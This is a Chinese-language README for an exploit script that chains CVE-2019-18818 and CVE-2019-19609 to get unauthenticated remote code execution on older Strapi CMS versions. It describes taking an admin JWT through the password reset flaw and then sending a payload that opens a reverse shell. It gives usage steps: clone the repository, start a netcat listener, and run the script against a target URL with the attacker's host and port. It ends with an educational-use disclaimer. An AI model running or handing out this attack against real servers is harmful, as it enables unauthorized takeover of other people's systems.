展示结合了 CVE-2019-18818 和 CVE-2019-19609 的利用脚本,用于在 Strapi CMS 中实现未经认证的远程代码执行。
此脚本利用了 Strapi CMS 3.0.0-beta.17.4 及更低版本中的一个漏洞,允许未经认证的远程代码执行。
该利用方法首先利用密码重置漏洞获取管理用户的 JSON Web Token (JWT)。然后使用该令牌向 Strapi CMS 发送恶意负载,从而触发反向 shell 回连到攻击者的机器。
克隆仓库:
git clone https://github.com/Hackhoven/Strapi-RCE.git
进入目录
cd Strapi-RCE/
设置 Netcat 监听器
nc -nlvp <LPORT>
运行脚本,传入目标 URL、本地主机 IP 地址和本地主机端口作为参数
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
此脚本仅供教育目的使用。作者不赞同或支持将此脚本用于非法或不道德的活动。此脚本应仅在合法的安全研究或 CTF 环境中使用。使用风险自负。
由 Hackhoven 制作